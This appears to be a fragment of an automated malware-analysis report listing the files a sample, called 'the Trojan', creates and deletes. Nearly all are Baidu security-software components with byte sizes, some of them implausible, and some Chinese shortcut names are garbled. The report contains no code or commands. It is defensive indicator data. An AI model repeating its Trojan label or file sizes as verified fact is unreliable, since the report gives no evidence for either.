%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\systemfile.dat (6 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMNetMon.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vatl.msi (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerConfig.dat (900 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBugRpt.exe (3361 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Softmgr.rdb (690 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SmartTips.rdb (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy_baiduan.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsUpdate.exe (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\StartupDict.dat (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\8500.dat (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMReport.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense_x64.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerTrayPlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMProcessRunningTime.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAFileHelper.exe (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVEng.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDLogicUtils.dll (10136 bytes)
%Documents and Settings%\All Users\Desktop\百度å«士.lnk (895 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDNetMisc.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr_remind.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\placeholder_tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVScanPlugin.dll (12088 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\百度å«士.lnk (907 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageCleanerConfig.dat (12 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMUpdate.rdb (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDConfig.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libeay32.dll (33391 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hipsClient.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSvc.exe (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HipsClient.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurllicense.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\uninst.exe (51840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDKitUtils.dll (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.sys (11144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\DriverManager.dll (8680 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\wverify.dat (15019 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\font_desc.f (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccStrategyMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBusiness.dll (9320 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SOManager.rdb (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerScript.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt.dll (15168 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Mainpage.rdb (23936 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch.7z (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMsg.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAVCache.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonMgrDll.dll (1856 bytes)
%System%\config (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepBase.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\TrustAndIso.dll (14416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWParseDetect.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.sys (19752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMWindowsLib.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginSetup.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bdmantivirus\BDKitUtils.dll (601 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysOptDict.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SusPlugin.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerConfig.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\InstallHelper.dll (37368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_repairproperty.dat (2 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMNet.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\preliminary.db (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSCleaner.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSoftMgrModule.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\å¸载百度å«士.lnk (880 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\CommonRes.rdb (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSafePlugin.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccServicePlugin.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt64.dll (20624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMToolBox.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixer.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWAcc.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerXMLScript.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCommon.dll (10136 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVEng.dll (50840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_class_filter.db (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\kav_compatible.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMReport.dll (25672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_property.dat (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCScriptBind.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\EnhanceBoost.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ad.dll (38248 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Patcher.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDDefense_x64.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccTrayPlugin.dll (14184 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_extlist.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\color_desc.clr (213 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\policy.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduPrevUIn.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOHomePageCleanerConfig.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcherPlugin.dll (39770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\pluginUnit.dat (727 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSAccMgrDll.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWHelper.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsCore.dll (30344 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SafePlugin.rdb (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeXMLScript.dat (519 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHips.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\ns19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNetComm.dll (12088 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMScriptVM.dll (8184 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\blacksign.dat (1389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMFrameWork.dll (21480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSusPlugin.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTrayTipsPlugin.dll (23424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMainFrame.dll (34773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOPluginCleanerConfig.dat (441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\install_res.rdb (40702 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMConnect.dll (28288 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysAccelerator.rdb (6584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0001.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0001.sys (673 bytes)
%System%\config\system (6543 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\openssllicense.txt (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWManagerView.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAccount.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bduf.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSkin.dll (33263 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_minute_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccDataMgr.dll (11048 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVMain.rdb (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduPrevUIn.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysRepLib.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSWPlugin.exe (784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMFrameWork.dll (1425 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\TrustAndIso.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTinyXml.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMFrameWork.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerPlugin.dll (88648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerCheckItem.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMNet.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDALeakfixer.exe (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysFixer.rdb (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUpdate.dll (14840 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMWrench.sys (7192 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (1068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NetService.ini (1205 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SWCatalogDataItem.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HotPlugins.xml (386 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMLog.dll (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCloudEng.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSmartTip.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginConfig.db (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeConfig.dat (497 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMSetting.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\skin_engine.dll (13584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUserCenter.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\WebSafe.dll (33455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
The Trojan deletes the following file(s):
%Program Files%\baidu\BaiduAn\3.0.0.3971\baiduan_number_new.ttf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\System.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDArKit.sys (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\dl.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0001.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDArKit.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\nsExec.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\text_cn.str (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDDefense.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\vcrt.msi (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\vatl.msi (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSystemVer.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BaiduAnBugRpt.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\install_res.rdb (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDLogicUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\font_desc.f (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\7z.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSupplyId.dll (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\百度å«士-软件管ç†.lnk (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\InstallHelper.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMNet.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDDefense_x64.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\color_desc.clr (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0001.sys (0 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Download\bdcomproxy.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (0 bytes)
